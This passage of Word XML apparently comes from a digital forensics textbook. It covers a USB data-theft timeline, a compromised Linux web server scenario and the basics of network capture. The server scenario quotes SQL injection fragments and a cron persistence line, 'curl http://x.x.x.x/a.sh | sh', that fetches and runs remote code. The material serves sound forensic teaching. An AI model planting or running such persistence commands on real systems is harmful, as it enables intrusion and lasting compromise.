        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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copy existed on drive E: (removable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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USBSTOR / MountedDevices</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Kingston DataTraveler, serial 0019E06B…, first connected 23:42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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USB drive was connected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Shellbags</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Folder browsing on E:\ at 23:43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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looked at the USB drive’s folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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6</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UserAssist / Prefetch</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7-Zip ran at 23:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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Possible compression of files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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USB removal events</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Device removed at 23:47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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Session ended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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8</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Recycle Bin / browser</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 shows a file deleted at 23:50; history shows a cloud-storage upload site visited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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Possible cleanup and an alternative way of sending data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion (example):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The artefacts are consistent with the user opening the file, connecting a specific USB device, copying files to it and removing it between 23:40 and 23:47. To state this more firmly, the USB device itself should be examined and the same serial number matched.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario B — Compromised Linux web server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache2/access.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows many requests with SQL keywords (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1</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UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) from one IP, followed by a request to an uploaded file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a new user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> created with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and an SSH login for it from the same IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">support</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/home/support/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds an unknown key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/crontabs/root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a job calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://x.x.x.x/a.sh | sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> every 10 minutes (persistence).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains a hidden folder with tools; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">bash_history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (root) shows its use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A timeline built from these logs shows: web exploit → shell upload → new account → cron persistence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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IV — Network, Email, Cloud &amp; Mobile Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Network Forensics Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network forensics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the capture, recording and analysis of network traffic and network device records to investigate incidents. When two systems communicate they leave traces: packets, connections, DNS requests, firewall records and proxy logs. These show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">who talked to whom, when, using which protocol, and sometimes what was said</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is used to investigate intrusions, malware communication, data theft, unauthorised access, and policy violations. Network evidence is also valuable because an attacker who deletes files on a computer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot easily erase what already crossed the network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic building blocks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Packet</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small unit of data sent over a network, with a header (source, destination, protocol, port) and a payload</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Protocol</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Rules for communication: TCP (reliable, connection-based), UDP (fast, connectionless), HTTP/HTTPS (web), DNS (name lookup), FTP (file transfer), SMTP (email)</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Port</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number that identifies a service on a host, e.g. 80 HTTP, 443 HTTPS, 21 FTP, 22 SSH, 25 SMTP, 53 DNS, 3389 RDP</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Five-tuple</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Source IP, source port, destination IP, destination port, protocol — the identity of one connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:left w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:bottom w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:right w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F3ECF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A3D9A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">↔ Network evidence vs endpoint evidence</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Network evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows communication </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">between</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> systems (IPs, ports, DNS, packets). </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows what happened </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> one system (processes, files, registry, event logs). Neither is complete alone. A packet capture may show a connection to a bad IP, but only the endpoint tells </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">which program and which user</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> made it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What to capture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2924"/>
        <w:gridCol w:w="2437"/>
        <w:gridCol w:w="2436"/>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Pros</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Full packet capture (PCAP)</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copy of every packet including payload</w:t>
            </w:r>
          </w:p>
        </w:tc>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Complete detail; files and credentials can be rebuilt</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Very large storage; encrypted payload is unreadable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Flow data (NetFlow/IPFIX)</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Summary records: who, to whom, how much, when</w:t>
            </w:r>
          </w:p>
        </w:tc>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Small, can be kept for months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content</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Logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (firewall, proxy, DNS, IDS, DHCP, VPN)</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Records written by network devices</w:t>
            </w:r>
          </w:p>
        </w:tc>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Easy to search; show allowed/blocked traffic and users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Only what the device decided to log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Where to capture — TAP and SPAN</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119"/>
        <w:gridCol w:w="2339"/>
        <w:gridCol w:w="233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311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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Strengths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Limitations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Network TAP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Test Access Point)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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passive hardware device placed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">in line</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in a cable. It copies all traffic in both directions to a monitoring port.</w:t>
            </w:r>
          </w:p>
        </w:tc>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Sees everything, including errors; does not drop packets; cannot be turned off by software; does not affect the network</w:t>
            </w:r>
          </w:p>
        </w:tc>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Needs physical installation; costs money; the link is briefly interrupted when fitted</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SPAN / port mirroring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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switch setting that copies traffic from one or more ports/VLANs to a monitoring port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Cheap, easy, remote; no extra hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Switch may drop packets under load; low priority for the switch; can be changed by an administrator; may miss errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Capturing traffic with a TAP</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rPr>
          <w:cantSplit/>
        </w:trPr>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Internet / router</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Firewall</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Network TAP</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Internal switch</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Capture machine (Wireshark)</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Capture hygiene</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
